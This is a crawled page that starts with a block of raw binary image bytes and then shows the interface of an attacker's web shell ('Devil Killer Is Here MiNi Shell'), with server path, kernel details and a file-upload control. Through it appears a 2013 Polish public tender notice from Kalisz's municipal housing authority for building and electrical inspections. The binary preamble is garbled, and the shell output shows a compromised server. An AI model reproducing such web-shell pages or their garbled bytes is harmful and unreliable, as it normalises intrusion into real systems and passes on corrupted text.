JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130813/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130813/326500-N-2013.html

<p class="kh_header"><b>Kalisz: Wykonanie kontroli stanu technicznego budynków będących w zarządzie MZBM w Kaliszu, zgodnie z  ustawą Prawo budowlane,w podziale na 6 części</b><br>
<b>Numer ogłoszenia: 326500 - 2013; data zamieszczenia: 13.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Dobrzecka 18, 62-800 Kalisz, woj. wielkopolskie, tel. 62 598 55 00, faks 62 598 55 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzbm.kalisz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zakład Budżetowy Gminy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie kontroli stanu technicznego budynków będących w zarządzie MZBM w Kaliszu, zgodnie z  ustawą Prawo budowlane,w podziale na 6 części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  wykonanie kontroli stanu technicznego budynków będących w zarządzie MZBM w Kaliszu, zgodnie z ustawą Prawo budowlane,            w podziale na 6 części.:

Część 1  : Kontrola roczna stanu technicznego budynku 
Liczba budynków  : 175,

Część 2 : Kontrola roczna stanu technicznego budynku i kontrola pięcioletnia (przegląd budowlany i sanitarny)  
Liczba budynków mieszkalnych : 97 budynków
Liczba budynków użytkowych : 1 ,                                                                                    

Część 3 : Kontrola roczna stanu technicznego budynku i kontrola pięcioletnia (przegląd budowlany i sanitarny) 

Liczba budynków mieszkalnych : 34 budynków
Liczba budynków użytkowych : 3 budynki,                                                                                         

Część 4 :Kontrola 5-cio letnia stanu technicznego budynku (przegląd elektryczny) wraz z badaniem instalacji elektrycznej i piorunochronnej,   

Liczba budynków mieszkalnych : 97 budynków,
Ilość lokali mieszkalnych i użytkowych w budynkach mieszkalnych : 1137 (1094+43),

Liczba budynków użytkowych : 1 budynek,                                                                                        
pow. użytkowa lokalu użytkowego w budynku użytkowym : 219,08 m2,

Część 5: Kontrola 5-cio letnia stanu technicznego budynku (przegląd elektryczny) wraz z badaniem instalacji elektrycznej i piorunochronnej, 

Liczba budynków mieszkalnych : 34 budynków,
Ilość lokali mieszkalnych i użytkowych w budynkach mieszkalnych : 454 (426+28),

Liczba budynków użytkowych : 3 budynki,                                                                                         
pow. użytkowa lokali użytkowych w budynkach użytkowych : 130,28 m2 

Część 6: Kontrola 5-cio letnia -badanie instalacji elektrycznej ,   
Ilość lokali mieszkalnych i użytkowych  :  258.

Uwaga : Pod pojęciem budynku mieszkalnego Zamawiający rozumie budynek główny wraz z oficyną/oficynami na danej posesji.


Zakres kontroli dla poszczególnych części obejmuje : 
Część 1: 
.	kontrolę okresowa, co najmniej raz w roku, polegającą na sprawdzeniu stanu technicznego elementów budynku i instalacji narażonych na szkodliwe wpływy atmosferyczne i niszczące działania czynników występujących podczas użytkowania obiektu (art. 62 ust.1 pkt 1) lit.a) ustawy Prawo budowlane - Dz. U. z 2010r. Nr 243,poz. 1623 z późn. zm), 
Część 2 i 3:
1)	kontrolę okresową, co najmniej raz w roku, polegającą na sprawdzeniu stanu technicznego elementów budynku i instalacji narażonych na szkodliwe wpływy atmosferyczne i niszczące działania czynników występujących podczas użytkowania obiektu (art. 62 ust.1 pkt 1) lit.a) ustawy Prawo budowlane - Dz. U. z 2010r. Nr 243,poz. 1623 z późn. zm), 
2)	kontrolę okresową, co najmniej raz na 5 lat, polegającą na sprawdzeniu stanu technicznego i przydatności do użytkowania obiektu budowlanego, estetyki obiektu budowlanego oraz jego otoczenia (przegląd budowlany i sanitarny),
Część 4 i 5 :
.	kontrolę okresową, co najmniej raz na 5 lat, polegającą na sprawdzeniu stanu technicznego i przydatności do użytkowania instalacji elektrycznej w obiekcie budowlanym, estetyki obiektu budowlanego oraz jego otoczenia oraz badanie instalacji elektrycznej i piorunochronnej w zakresie stanu sprawności połączeń, osprzętu, zabezpieczeń i środków ochrony od porażeń, oporności izolacji przewodów oraz uziemień instalacji i aparatów (art. 62 ust. 1 pkt 2 ustawy - Prawo budowlane Dz. U. z 2010r. Nr 243,poz. 1623 z późn. zm).,
      
Część 6 :
.	kontrolę okresową, co najmniej raz na 5 lat - badanie instalacji elektrycznej                      w zakresie stanu sprawności połączeń, osprzętu, zabezpieczeń i środków ochrony od porażeń, oporności izolacji przewodów oraz uziemień instalacji i aparatów (art. 62 ust. 1 pkt 2 ustawy - Prawo budowlane Dz. U. z 2010r. Nr 243,poz. 1623 z późn. zm).

Dodatkowe regulacje dotyczące kontroli okresowych budynku zawiera Rozporządzeniu Ministra Spraw Wewnętrznych i Administracji z dnia 16 sierpnia 1999 r. w sprawie warunków technicznych użytkowania budynków mieszkalnych         (Dz. U. Nr 74, poz. 836). W myśl § 6 tego rozporządzenia zakresem okresowej kontroli, o której mowa w art. 62 ust. 1 pkt 2 ustawy (tj. kontroli okresowej co najmniej raz na 5 lat), należy objąć również sprawdzenie stanu sprawności technicznej i wartości użytkowej elementów budynku, o których mowa w § 5, oraz wszystkie pozostałe elementy budynku, a także estetykę budynku i jego otoczenia .
Zgodnie natomiast z § 5 ust. 1 tego rozporządzenia, okresowej kontroli, o której mowa w art. 62 ust. 1 pkt 1 lit. a ustawy, podlegają elementy budynku narażone na szkodliwe wpływy atmosferyczne i niszczące działania czynników występujących podczas użytkowania, których uszkodzenia mogą powodować zagrożenie dla : bezpieczeństwa osób, środowiska oraz  konstrukcji budynku.                                 

Zgodnie z § 5 ust. 2 tego rozporządzenia, w toku kontroli szczegółowym sprawdzeniem należy objąć stan techniczny: 
.zewnętrznych warstw przegród zewnętrznych (warstwa fakturowa), elementów ścian zewnętrznych (attyki, filary, gzymsy), balustrad, loggii i balkonów, 
.urządzeń zamocowanych do ścian i dachu budynku, 
.elementów odwodnienia budynku oraz obróbek blacharskich, 
.pokryć dachowych, 
.instalacji centralnego ogrzewania i ciepłej wody użytkowej, 
.urządzeń stanowiących zabezpieczenie przeciwpożarowe budynku, 
.elementów instalacji kanalizacyjnej odprowadzających ścieki z budynku, 
.przejść przyłączy instalacyjnych przez ściany budynku. 

Wykaz posesji (w podziale na części) na których zlokalizowane są budynki objęte przedmiotem zamówienia stanowią załączniki nr 7-10 do SIWZ..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających,  stanowiących nie więcej niż  50 % wartości zamówienia podstawowego                       i  polegających na powtórzeniu tego samego rodzaju zamówień, w odniesieniu do każdej części.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.10.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	należycie wykonał usługę lub usługi w zakresie kontroli okresowej, przeprowadzanej co najmniej raz w roku, polegającej na sprawdzeniu stanu technicznego elementów budynku i instalacji narażonych na szkodliwe wpływy atmosferyczne i niszczące działania czynników występujących podczas użytkowania obiektu, a łączna liczba budynków  objęta kontrolą wynosiła minimum 30 budynków lub należycie wykonał usługę lub usługi w zakresie kontroli okresowej, przeprowadzanej co najmniej raz na 5 lat, polegającej na sprawdzeniu stanu technicznego i przydatności do użytkowania obiektu budowlanego, estetyki obiektu budowlanego oraz jego otoczenia (przegląd budowlany i sanitarny), a łączna liczba budynków objęta kontrolą wynosiła minimum 30 budynków - dotyczy części  1,
2)	należycie wykonał usługę lub usługi w zakresie kontroli okresowej, przeprowadzanej co najmniej raz na 5 lat, polegającej na sprawdzeniu stanu technicznego i przydatności do użytkowania obiektu budowlanego, estetyki obiektu budowlanego oraz jego otoczenia (przegląd budowlany i sanitarny), a łączna liczba budynków objęta kontrolą wynosiła minimum 30 budynków - dotyczy części 2 i 3,
3)	należycie wykonał usługę lub usługi w zakresie kontroli okresowej, przeprowadzanej co najmniej raz na 5 lat, polegającej na badaniu instalacji elektrycznej w zakresie stanu sprawności połączeń, osprzętu, zabezpieczeń i środków ochrony od porażeń, oporności izolacji przewodów oraz uziemień instalacji i aparatów, a łączna liczba lokali objęta badaniem wynosiła minimum 100 lokali - dotyczy części  4 ,5 i 6.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji kiedy wykaże, że dysponuje :
a)	co najmniej 1 osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą uprawnienia budowlane do projektowania lub kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej w zakresie niezbędnym do wykonania przedmiotu zamówienia lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów w tym zakresie - dotyczy części 1 ,2 i 3;
b)	co najmniej 1 osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą uprawnienia budowlane do projektowania lub kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych w zakresie niezbędnym do wykonania przedmiotu zamówienia  lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów w tym zakresie - dotyczy części 2 i 3;
c)	co najmniej 1 osobą, która będzie uczestniczyć w wykonywaniu zamówienia,  posiadającą uprawnienia budowlane do projektowania lub kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych w zakresie niezbędnym do wykonania przedmiotu zamówienia lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów w tym zakresie, 
lub osobą, posiadającą świadectwo kwalifikacyjne uprawniające  do zajmowania się eksploatacją urządzeń, instalacji i sieci energetycznych na stanowisku DOZORU, w zakresie kontrolno-pomiarowym - dotyczy części  4 ,5 i 6;
d)	co najmniej jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą świadectwo kwalifikacyjne uprawniające  do zajmowania się eksploatacją urządzeń, instalacji i sieci energetycznych na stanowisku EKSPLOATACJI , w zakresie kontrolno-pomiarowym - dotyczy części 4,5 i 6 .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.wypełniony formularz ofertowy z wykorzystaniem załączonego wzoru,
2.W przypadku podpisania oferty oraz poświadczenia za zgodność z oryginałem kopii dokumentów przez osobę niewymienioną w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo. Pełnomocnictwo musi być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza.
3.W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia (konsorcja, spółki cywilne) pełnomocnictwo, o którym  mowa      w pkt. 6.6. SIWZ. Pełnomocnictwo musi być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem (kopia pełnomocnictwa powinna być poświadczona notarialnie).
4.Wykonawca, zgodnie z art. 26 ust. 2b może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi 
do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne 
(tj. w oryginale lub poświadczone notarialnie) zobowiązanie tych podmiotów 
do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.   
5.W przypadku składania jednej oferty przez dwa lub więcej podmiotów (wykonawców ubiegających się wspólnie o udzielenie zamówienia np. konsorcja, spółki cywilne) oferta spełniać musi następujące wymagania :
a)	w odniesieniu do wymagań postawionych przez zamawiającego, każdy 
z wykonawców występujących wspólnie, oddzielnie musi udokumentować,       że nie podlega wykluczeniu na podstawie art. 24 ust.1 i art. 24.ust.2 pkt.5 ustawy Pzp, 
b)	warunek dotyczący posiadania wiedzy i doświadczenia, dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, a także sytuacji ekonomicznej i finansowej w sumie musi spełniać wymagane od wykonawców warunki,
c)	oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich wykonawców występujących wspólnie,
d)	wykonawcy występujący wspólnie, zgodnie z art. 23 ust.2 ustawy, muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia lub do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego  - stosowny dokument należy załączyć do oferty - w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza.
e)	wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie 
z podmiotem występującym jako reprezentant pozostałych.

6. Dodatkowe zapisy SIWZ:
1)Dowodami, o których mowa w pkt.III.4.1. niniejszego ogłoszenia (wykaz usług) są:
a)poświadczenie, z tym, że w odniesieniu do nadal  wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert,
b)oświadczenie wykonawcy- jeżeli z uzasadnionych przyczyn  o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w ppkt.a),  
2)Wykonawca w miejsce poświadczenia, o którym mowa wyżej może przedłożyć dokumenty potwierdzając należyte wykonanie usług zgodnie z zasadami sztuki budowlanej i ich prawidłowe ukończenie, określone w  § 1 ust.1 pkt  2 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U.Nr 226,poz.1817).
3)W przypadku gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w pkt  6. ppkt 1).
Za główne usługi uznaje się usługi niezbędne do wykazania spełnienia warunku określonego w pkt, III.3.2. niniejszego ogłoszenia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający zastrzega sobie prawo  z przyczyn od niego niezależnych i (lub) z powodu zmniejszenia ilości  zarządzanych budynków, do zmniejszenia zakresu ilościowego przedmiotu umowy. Zmniejszenie zakresu będzie podstawą do proporcjonalnego zmniejszenia wynagrodzenia Wykonawcy.
2.W przypadku nie udostępnienia przez najemcę lokalu objętego niniejszą umową, Wykonawcy przysługuje wyłącznie wynagrodzenie za wykonaną część przedmiotu umowy, pod warunkiem, że Wykonawca spełnił obowiązki wskazane w § 5 ust 1 umowy.
3.W trakcie obowiązywania umowy nie przewiduje się zmiany ceny jednostkowej brutto i maksymalnego wynagrodzenia przysługującego Wykonawcy, chyba że zmiany te nastąpią na skutek zmiany stawki podatku VAT.
4.Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia :
1)zmiana terminu realizacji przedmiotu umowy :
a)w przypadku nieudostępnienia lokali w budynkach,  w celu wykonania kontroli, niezależnego od Wykonawcy,
b)działania siły wyższej,
c)działania  osób trzecich  uniemożliwiających wykonanie prac, które  to działania nie są konsekwencją winy którejkolwiek ze stron;
d)wystąpienia okoliczności, których strony nie były w stanie przewidzieć i im zapobiec pomimo zachowania należytej staranności,

W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt.1) ppkt. a)-d termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.
2)Zmiany osobowe :
a)zmiana podwykonawcy, przy pomocy którego Wykonawca realizuje przedmiot umowy na innego - dysponującego co najmniej porównywalnymi uprawnieniami i kwalifikacjami.
5.Wszystkie powyższe postanowienia, o których mowa w pkt. 4. stanowią katalog zmian na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. O wystąpieniu okoliczności mogących wpłynąć na zmianę umowy Wykonawca winien jest poinformować Zamawiającego pisemnie i niezwłocznie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.mzbm.kalisz.pl/articles2.php?article_id=143<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kalisz, ul. Dobrzecka 18 (I piętro pok. nr 105) opłata 13,53 zł lub za zaliczeniem pocztowym (przesyłka pobraniowa), w tym przypadku koszt przesyłki ponosi Wykonawca.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.08.2013 godzina 12:00, miejsce: siedziba Zamawiającego: Kalisz, ul. Dobrzecka 18 (parter-Biuro Obsługi Interesantów-Biuro podawcze).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kontrola roczna stanu technicznego budynku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jak w pkt.II.1.4. niniejszego ogłoszenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.10.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
